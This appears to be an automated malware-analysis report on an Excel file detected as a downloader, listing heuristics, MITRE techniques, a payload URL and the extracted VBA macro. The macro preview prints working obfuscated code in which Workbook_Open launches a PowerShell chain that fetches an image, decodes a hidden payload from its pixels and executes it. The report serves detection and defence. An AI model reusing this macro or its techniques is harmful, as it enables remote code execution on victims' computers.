MALICIOUS
224
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1071.001 Web Protocols
The critical OLE_VBA_SHELL and OLE_VBA_PCODE_AUTOEXEC_EXEC heuristics indicate that the Workbook_Open macro executes a Shell() command. The de-obfuscated URL 'https://images2.imgbox.com/36/b6/FP0V28Vz_o.png' is likely used to download and execute a second-stage payload. The ClamAV detection further supports the malicious nature of the file.
Heuristics 7
-
ClamAV: Xls.Downloader.Sload-6923246-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Downloader.Sload-6923246-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
URL de-obfuscated from VBA string literal (1 URL) info OLE_VBA_OBFUSCATED_URLA VBA macro hides its download URL inside a string literal that is de-obfuscated at runtime — junk digits or a Replace() junk token interleaved through the URL, or the URL stored reversed (StrReverse). The decoded host is the next-stage payload URL (URLDownloadToFile/XMLHTTP/ShellExecute); surfaced as an IOC. Self-validating: only a transform that yields a syntactically valid host URL is reported.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://images2.imgbox.com/36/b6/FP0V28Vz_o.png Referenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4885 bytes |
SHA-256: 53ddadd106819070d2d73af8d3050be9d5b27ef574367d907676a309f2cf8e42 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub kxnWvm()
Call Shell(Replace(afilate + immigration + actualprice, "?", ""), 14 - 14)
End Sub
Sub Workbook_Open()
kxnWvm
End Sub
Function afilate()
babber = "??????C?????M??????d? ????/c????? f^o?^r , ; ; ; ; ; ; /^F ; ; , ; , , , "" to?ke???ns= 1 de?l?i?ms=?af?B?pC?"" , ; ; , ; ; ; ?%?b , , , , ; ; ?^I?n ; ; ; , ; ; ; ( ; ; , , , ; ; ' , , ; ^^?F^^t?^^?Y^^P?^^E? ; , ; ^| , , ; , ^^F^^i??nD^^s?T^^R ; , , ^^c?^^m ' , ; , , , ; ) ; , , , ; ^d^O , ; ; ; ; %b /c "" e???Ch????O ?SE?t? ('JR'+'K?A') ([T?y???pe]('M???at'+'?h') ); $0Wrn?f3= [t????yP??E]('s'+'y???S'+'?t'+'eM.'+'TE??X??T.E????nco????DI??"
raro = "??N'+'g') ;^^^&('s'+'al') ('a') (""{0}{2}{1}""-f 'N','t','e???w-O?bj???ec');.('Ad?????????d'+'-Ty?????pe') -As??????se?????mb????ly?Na?????????me ""S???????y?????????s????te?m?.Dr??a??w???ing"";${G}=.('a') "
afilate = babber + raro
End Function
Function immigration()
dayoffs = "(""{5}{3}{1}{0}{2}{4}""-f'e?m.','st','Dr','y','awi?ng.Bit?m???ap','S')((.('a') (""{1}{2}{0}"" -f 'eb???Cl??????ie?nt','Net','.W')).(""{1}{0}{2}"" -f 'e','Op','nRe??????????ad').I?nv????????ok??????????????e(""??????h???t????t???p????s??:/????/?????ima???ge???s2.im??gb??ox.c??om/3?6/b?6/FP0?V28Vz_?o.pn?g???????""));${o}=^^^&('a') (""{0}{1}"" -f 'B','yte[]') 1380;(0..2)^^^|^^^&('%'){foreach(${x} in(0..459)){${p}=${G}.(""{0}{1}"" -f 'G','etPixel').Invoke(${x},${_});${O}[${_}*460+${X}]=( ( gE??T?-?Va???RIA??BLE ('JR'+'ka') ).VAl??UE::(""{0}{1}""-f 'Fl','oor').I?n??v?o?k?e?((${p}.""b""-ba?nd15)*16)-bor(${P}.""g"" -ba??nd 15))}};.('I'+'EX')( $0wRNf3::""A?SC`iI"".""Ge?TS??Tr`I`Ng""(${O}[0..1056]))|cL??iP.e??x???e&&%P??UB?LI???C:~14%m??d /?c ?po??W??er??S???h?el?L? -s?t??A -nO???nIn ? -w?i??Nd? 1 ? ?-?E?x?E?CUT??Ionp?oli???C ? ?b?Y??pA???S?S?? -N?O?P???RO??"
bermudos = "??Fi??L -N??ol??oG?????????????????O -c??????? ${6`E9}= [Sy???st???e????????????????????????????????????????m.R???efl????ec???ti????on.A??????????????????????????????ss??emb???ly]::( \""{1}{0}{3????????????????????????}{2}{4}\""-f 'W',(\""{0}{1}\""-f'Lo','ad' ),'th','i',( \""{1}{0}{3}{2}\"" -f'tialN','Par','e','am' )).\""In?V?`Oke\""(( \""{5}{1}{2}{3}{4}{0}\""-f "
immigration = dayoffs + bermudos
End Function
Function actualprice()
actualprice = "'s','ste?m.','W','in????????????d?ow?s.','F?orm','Sy' ) ) ; ( .('GV') ( \""{0}{1}{3}{2}\""-f '????????????ex?ec????????????uT','io?N','E????????????????x?t','C?ONt' ) -vA?lu?EOn?L ).\""I`N?v??ok?eC??oMm`A??Nd\"".\""I???Nv??oK`E?sc`R??IPT\""( ( [S??y?sT??em.W??IN??dO??wS?.F??oR?MS.cl??IpB?oAr??d]::( \""{1}{0}\"" -f'XT',(\""{0}{1}\""-f 'g?et','te' ) ).\""In???VO`K???E\""( )) ) ; [S??ys???te??m.Wi????ndo??w?s.?Fo??rms.C??lipb??oar??d]::( \""{1}{0}\""-f'r',( \""{0}{1}\"" -f'Cl','ea' )).\""?I?n????v`Ok???e\""( )"""
End Function
Attribute VB_Name = "Sheet6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Globa
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.